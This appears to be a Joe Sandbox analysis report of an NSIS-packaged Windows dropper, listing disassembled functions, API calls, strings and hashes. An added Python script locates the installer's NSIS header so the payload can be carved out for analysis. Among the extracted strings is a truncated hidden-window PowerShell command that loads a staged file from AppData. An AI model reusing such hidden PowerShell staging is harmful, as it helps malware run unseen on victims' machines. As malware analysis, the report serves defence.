                                                      • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                      • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                      • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph
                                                       (rendered graph not recoverable; the node/edge listing covered basic blocks 0x403d54 to 0x404029, from the lstrcatW block at 0x403dcf through RegisterClassW/CreateWindowExW at 0x403ed2-0x403f4c to DialogBoxParamW at 0x403fc4; the APIs it references are listed below)
                                                      APIs
                                                        • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                        • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                      • lstrcatW.KERNEL32(1033,00422F48), ref: 00403DD5
                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420), ref: 00403E55
                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403E73
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238), ref: 00403EBC
                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                      • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                      • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                      • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                      • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                      • API String ID: 1975747703-1665175156
                                                      • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                      • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                      • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                      • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph
                                                       (rendered graph not recoverable; the node/edge listing covered basic blocks 0x4030d5 to 0x403373, from GetTickCount/GetModuleFileNameW at 0x4030d5 and GetFileSize at 0x40312f through the signature-compare loop at 0x4031b1-0x4031d3 to GlobalAlloc/CreateFileW at 0x40328b; the APIs it references are listed below)
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004030E9
                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00403105
                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040314E
                                                      • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                      Strings
                                                      • "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", xrefs: 004030DE
                                                      • soft, xrefs: 004031C3
                                                      • Null, xrefs: 004031CC
                                                      • Error launching installer, xrefs: 00403125
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
                                                       • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author, xrefs: 00403327
                                                      • Inst, xrefs: 004031BA
                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
                                                      • C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
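The strings of this function ("Null", "soft" and "Inst" compared as three consecutive DWORDs at 0x4031BA, 0x4031C3 and 0x4031CC, the 0x8001-byte GlobalAlloc buffer at 0x403290, and the NSIS error texts "Error launching installer", "Error writing temporary file" and "Installer integrity check has failed") identify 0x4030d5 as the NSIS installer stub routine that opens its own image via GetModuleFileNameW and searches it for the NSIS firstheader that precedes the compressed payload. The Python below is an added triage example, not code from this report, from the sample or from NSIS: it performs the same search over an in-memory copy of a file. The firstheader layout, the 0xDEADBEEF signature value and the FH_FLAGS_* bit names are taken from the NSIS source as I know it and are assumptions here; the image it scans by default is constructed inside the script.

```python
"""Locate the NSIS firstheader that the installer stub at 0x4030d5 searches for."""
import struct
import sys

# NSIS firstheader layout (assumption from the NSIS source, not from the report):
#   uint32 flags, uint32 siginfo (0xDEADBEEF), char nsinst[12] ("NullsoftInst"),
#   uint32 length_of_header, uint32 length_of_all_following_data
FIRSTHEADER = struct.Struct("<II12sII")
NSIS_SIG = 0xDEADBEEF
NSIS_MAGIC = b"NullsoftInst"  # the stub compares it as three DWORDs: "Null", "soft", "Inst"
FLAG_NAMES = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}  # FH_FLAGS_* (assumption)


def find_nsis_firstheader(data: bytes):
    """Return a dict describing the first valid NSIS firstheader in data, or None.

    Every occurrence of the 12-byte magic is a candidate; it is accepted only when
    the preceding siginfo DWORD is 0xDEADBEEF. The declared data length is then
    compared against the file size: a header whose data runs past the end of the
    file is the kind of mismatch behind "Installer integrity check has failed".
    """
    search_from = 0
    while True:
        idx = data.find(NSIS_MAGIC, search_from)
        if idx < 0:
            return None
        search_from = idx + 1
        start = idx - 8  # the magic follows flags and siginfo
        if start < 0 or start + FIRSTHEADER.size > len(data):
            continue
        flags, sig, _magic, hdr_len, data_len = FIRSTHEADER.unpack_from(data, start)
        if sig != NSIS_SIG:
            continue  # stray "NullsoftInst" string without the signature
        return {
            "offset": start,
            "flags": [name for bit, name in FLAG_NAMES.items() if flags & bit],
            "length_of_header": hdr_len,
            "length_of_all_following_data": data_len,
            "length_consistent": start + data_len <= len(data),
        }


def build_sample() -> bytes:
    """Constructed stand-in for an NSIS installer image (not the analysed sample)."""
    # 0x400 bytes of fake stub containing a decoy magic string with no signature
    stub = b"MZ" + b"\x00" * 100 + NSIS_MAGIC + b"\x00" * (0x400 - 114)
    payload = b"\x5d\x00\x00\x80\x00" + b"\xab" * 300  # fake compressed data block
    hdr = FIRSTHEADER.pack(4, NSIS_SIG, NSIS_MAGIC, 0x60, FIRSTHEADER.size + len(payload))
    return stub + hdr + payload


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(find_nsis_firstheader(image))
```

Run it with a path argument to scan a real file; with no argument it scans the constructed image, skips the decoy string in the fake stub and reports the header at offset 0x400 with the NO_CRC flag set. The header offset is where the stub starts reading the compressed NSIS data, which is the region to carve when unpacking a GuLoader-style NSIS dropper for further analysis.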
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-481959147
                                                      • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                      • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                      • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                      • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004067E1
                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                      • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406855
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406889
                                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                      • String ID: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 4024019347-2983627749
                                                      • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                      • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                      • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                      • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                      • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl,"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl,00000000,00000000,"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151,?,?,00000031), ref: 004017DA
                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151$afsmitningernes$distributed\Ristingets\
                                                      • API String ID: 1941528284-102784884
                                                      • Opcode ID: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                      • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                      • Opcode Fuzzy Hash: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                      • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                      • lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                      • lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                      • SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Completed
                                                      • API String ID: 2531174081-3087654605
                                                      • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                      • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                      • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                      • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401E56
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID: Times New Roman
                                                      • API String ID: 3808545654-927190056
                                                      • Opcode ID: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
                                                      • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                      • Opcode Fuzzy Hash: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
                                                      • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                      • wsprintfW.USER32 ref: 00406A58
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%S.dll$UXTHEME
                                                      • API String ID: 2200240437-1106614640
                                                      • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                      • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                      • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                      • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004061BF
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-678247507
                                                      • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                      • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                      • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                      • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph
                                                      
                                                      Nodes (basic blocks with the calls they contain):
                                                      • 765: 4015c6-4015da (call 402dab, call 405ffc)
                                                      • 770: 401636-401639
